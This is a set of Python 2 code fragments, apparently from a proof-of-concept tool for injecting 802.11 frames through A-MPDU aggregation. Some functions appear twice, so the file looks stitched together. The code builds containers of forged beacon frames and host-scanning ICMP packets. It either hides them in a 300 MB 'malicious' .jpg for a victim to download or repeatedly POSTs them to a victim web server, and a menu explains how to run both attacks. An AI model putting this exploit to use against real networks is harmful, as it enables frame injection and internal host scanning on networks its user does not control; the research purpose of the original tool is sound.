def get_entry(self, client_ip): self.mutex.acquire() try: temp = self.arp_table[client_ip] except KeyError: temp = None printd("Could not find IP %s in ARP table." % client_ip, Level.WARNING) self.mutex.release() return temp
def get(self, key, default=None): value = None try: value = ConfigParser.get(self, 'fakeap', key) except NoOptionError as e: value = default printd("Option '%s' not specified in config file. Using default." % e.option, Level.WARNING) printd("%s -> %s" % (key, value), Level.INFO) return value
def get(self, key, default=None): value = None try: value = ConfigParser.get(self, 'fakeap', key) except NoOptionError as e: value = default printd( "Option '%s' not specified in config file. Using default." % e.option, Level.WARNING) printd("%s -> %s" % (key, value), Level.INFO) return value
def main_download(): # Malicious download raw_input("This will create a 300 MB file download.jpg in the working directory. Press any key to continue or CTRL+C to exit.") printd(clr(Color.YELLOW, "Creating malicious download..."), Level.INFO) container = "" for i in range(0, 256): # Containers are (series of) frames to inject into the remote network # Container for scanning hosts on internal network #md_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '4C:5E:0C:9E:82:19', '4C:5E:0C:9E:82:19', 0x02) #md_pkt.add_msdu(ping_packet(i, "10.0.0.1", "192.168.88.249")) #md_pkt.add_padding(8) # Container for a Beacon frame md_pkt = ssid_packet() container += str(md_pkt) md = MaliciousDownload(container) md.write()
def add_msdu(self, msdu, msdu_len=-1): # Default msdu len if msdu_len == -1: msdu_len = len(msdu) mpdu_len = len(self.dot11hdr) + msdu_len + 4 # mac80211 + msdu + FCS # print the length of the padding print 'MPDU length: ', mpdu_len if mpdu_len % 4 != 0: frame_padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets printd("Padding added: ", Level.INFO) for character in str(frame_padding): print "\\x", character.encode('hex'), printd("", Level.INFO) else: frame_padding = "" printd("No padding added", Level.INFO) sys.stdout.flush() mpdu_len <<= 4 crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF) crc = crc_fun(struct.pack('<H', mpdu_len)) maccrc = dot11crc(str(self.dot11hdr / msdu)) # the packet alreacy contains the 'rt' and the 'dot11hdr', so I add the other things self.data = self.data / msdu / maccrc / frame_padding
def main(): session = requests.Session() count = 1 ip_count = 0 printd(clr(Color.BLUE, "Building container..."), Level.INFO) """ Build container """ container = '' for i in range(0, 800): count = (count + 1) % 1024 ip_count = (ip_count % 255) + 1 # Ping from attacker --> victim # You need to change the MAC addresses and IPs to match the remote AP ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02) ampdu_pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))) ampdu_pkt.add_padding(8) container += str(ampdu_pkt) # Beacon from attacker --> victim #ampdu_pkt = ssid_packet() #container += str(ampdu_pkt) # Ping from victim --> access point #ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19') #ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count))) #ampdu_pkt.add_padding(8) #container += str(ampdu_pkt) """ end package """ printd(clr(Color.BLUE, "Finished building container! Sending..."), Level.INFO) while 1: print("."), sys.stdout.flush() request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + str(container)} try: session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5) except requests.exceptions.ConnectionError: printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL) pass except Exception: printd(clr(Color.RED, "Another exception"), Level.CRITICAL) pass
def add_msdu(self, msdu, msdu_len=-1): # Default msdu len if msdu_len == -1: msdu_len = len(msdu) mpdu_len = len(self.dot11hdr) + msdu_len + 4 # mac80211 + msdu + FCS # print the length of the padding print 'MPDU length: ', mpdu_len if mpdu_len % 4 != 0: frame_padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets printd("Padding added: ", Level.INFO) for character in str(frame_padding): print "\\x", character.encode('hex'), printd("", Level.INFO) else: frame_padding = "" printd("No padding added", Level.INFO) sys.stdout.flush() mpdu_len <<= 4 crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF) crc = crc_fun(struct.pack('<H', mpdu_len)) maccrc = dot11crc(str(self.dot11hdr / msdu)) delim_sig = 0x4E #print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig)) #hexdump(maccrc) ampdu_header = struct.pack( '<HBB', mpdu_len, crc, delim_sig ) #'pack' returns a string containing the given values, packed according to the given format #hexdump(ampdu_header) self.data = self.data / ampdu_header / self.dot11hdr / msdu / maccrc / frame_padding self.num_subframes += 1
print("."), sys.stdout.flush() request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + str(container)} try: session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5) except requests.exceptions.ConnectionError: printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL) pass except Exception: printd(clr(Color.RED, "Another exception"), Level.CRITICAL) pass if __name__ == "__main__": try: pocnum = raw_input("Two PoCs are available. Suggested approach to test the vulnerability is to choose option 1" " and upload the file to your web server. Then, download while connected to an _open_ " "network and observe Wireshark output for MAC 00:00:00:00:00:00 in monitor mode. Waving " "your hand over the antenna of the receiver can speed up the injection rate if you don't " "want to wait too long to see the results.\n" "\t1) Generate 300 MB .jpg file containing malicious Beacon frames (pulled by victim).\n" "\t2) Connect to victim web server and POST malicious host scanning ICMP frames (push to victim).\n" "Note: for option 2 you need to change the MAC addresses and IPs in the source to match the remote AP.\n" "Choice: ") if pocnum == "1": main_download() elif pocnum == "2": main() else: printd("Invalid PoC number.", Level.CRITICAL) except KeyboardInterrupt: printd("\nExiting...", Level.INFO)
def dump_to_file(self): with open('ampdu.bin', 'w') as f: printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO) f.write(str(self) * 250)
def main(): count = 1 ip_count = 1 # send the packet a number of times for i in range(0, 10): count = (count + 1) % 1024 ip_count = (ip_count % 255) + 1 # Ping from attacker --> victim # You need to change the MAC addresses and IPs to match the remote AP pkt = Dot11Packet('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B') printd(clr(Color.YELLOW, "Radiotap:"), Level.INFO) #sys.stdout.flush() hexdump.hexdump(str(pkt.rt)) #for character in str(pkt.rt): # this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 " #print '\\x',character.encode('hex'), sys.stdout.flush() printd("", Level.INFO) #print a linefeed printd(clr(Color.YELLOW, "802.11 hdr:"), Level.INFO) #sys.stdout.flush() hexdump.hexdump(str(pkt.dot11hdr)) sys.stdout.flush() # add an MSDU pkt.add_msdu( ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))) printd(clr(Color.YELLOW, "MSDU added:"), Level.INFO) #sys.stdout.flush() hexdump.hexdump( str(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))) sys.stdout.flush() printd(clr(Color.YELLOW, "Radiotap + 802.11 hdr + MSDU + CRC:"), Level.INFO) #sys.stdout.flush() hexdump.hexdump(str(pkt.data)) sys.stdout.flush() #for character in str(pkt.data): # this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 " #print "\\x",character.encode('hex'), #does not work in python3 #print character, character.encode('hex'), printd("", Level.INFO) #print a linefeed # send the packet pkt.send() #the interface has to be in monitor mode printd("packet sent", Level.INFO) time.sleep(0.1)
def main_ampdu(): # "Requests" Python library: http://docs.python-requests.org/en/master/user/advanced/ #session = requests.Session() count = 1 ip_count = 0 printd(clr(Color.BLUE, "Building container..."), Level.INFO) """ Build container """ container = '' for i in range(0, 2): count = (count + 1) % 1024 ip_count = (ip_count % 255) + 1 # Ping from attacker --> victim # You need to change the MAC addresses and IPs to match the remote AP ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02) printd(clr(Color.YELLOW, "Radiotap (rt):"), Level.INFO) #sys.stdout.flush() hexdump.hexdump(str(ampdu_pkt.rt)) for character in str(ampdu_pkt.rt): # this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 " print "\\x", character.encode('hex'), #does not work in python3 sys.stdout.flush() printd("", Level.INFO) #print a linefeed printd(clr(Color.YELLOW, "dot11hdr:"), Level.INFO) #sys.stdout.flush() hexdump.hexdump(str(ampdu_pkt.dot11hdr)) sys.stdout.flush() # add an MSDU to the AMPDU ampdu_pkt.add_msdu( ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))) printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO) #sys.stdout.flush() hexdump.hexdump(str(ampdu_pkt)) sys.stdout.flush() ampdu_pkt.add_padding(8) printd( clr(Color.YELLOW, "AMPDU with MSDU and 8 padding delimiters added:"), Level.INFO) #sys.stdout.flush() hexdump.hexdump(str(ampdu_pkt)) sys.stdout.flush() container += str(ampdu_pkt) # Beacon from attacker --> victim #ampdu_pkt = ssid_packet() #container += str(ampdu_pkt) # Ping from victim --> access point #ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19') #ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count))) #ampdu_pkt.add_padding(8) #container += str(ampdu_pkt) """ end package """ printd(clr(Color.BLUE, "Final A-MPDU built:"), Level.INFO) sys.stdout.flush() #hexdump.hexdump('\x00'*16) #hexdump.hexdump("Hello world") hexdump.hexdump(container) sys.stdout.flush() for character in container: # this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 " print "\\x", character.encode('hex'), #does not work in python3 #print character, character.encode('hex'), printd("", Level.INFO) #print a linefeed # send the packet a number of times for i in range(0, 10): # send the packet ampdu_pkt.send() #the interface has to be in monitor mode printd("packet sent", Level.INFO) time.sleep(0.1) """